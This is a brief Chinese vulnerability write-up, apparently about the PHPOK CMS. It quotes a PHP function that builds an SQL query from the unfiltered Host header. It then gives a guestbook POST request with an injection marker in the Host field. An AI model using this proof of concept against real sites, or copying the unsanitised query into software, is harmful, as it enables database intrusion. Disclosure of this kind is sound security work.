看文件 :/framework/model/www/site_model.php 66行
估计主机头注入很少能发现。
在多处调用了我们就直接拿留言板处测试。
public function get_one_from_domain($domain=‘‘) { $sql = "SELECT site_id FROM ".$this->db->prefix."site_domain WHERE domain=‘".$domain."‘"; //未过滤就进库 $cache_id = $this->cache->id($sql); $tmp = $this->cache->get($cache_id); if(!$tmp){ $this->db->cache_set($cache_id); $tmp = $this->db->get_one($sql); if(!$tmp){ return false; } $this->cache->save($cache_id,$tmp); } return $this->get_one($tmp[‘site_id‘]); }
提交POST
POST /phpok/api.php?c=post&f=save&_noCache=0.5898166163824499 HTTP/1.1 Host: localhost* Content-Length: 106 Accept: application/json, text/javascript, */*; q=0.01 Origin: http://localhost X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0 Content-Type: application/x-www-form-urlencoded Referer: http://localhost/phpok/message.html?_noCache=0.3242947137914598 Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: CY_VST_CM=5%7C342919005; CNZZDATA1256279252=2086651609-1450948940-http%253A%252F%252Flocalhost%252F%7C1451011143; bdshare_firstime=1451011761351; PHPSESSID=be7nqluc5jfcthpeq914qtteb1; SOHUCY-VISITOR-LEAD-LOGIN=2 id=message&title=admin&fullname=admin&mobile=admin&email=admin&pictures=&file=&content=admin&_chkcode=1548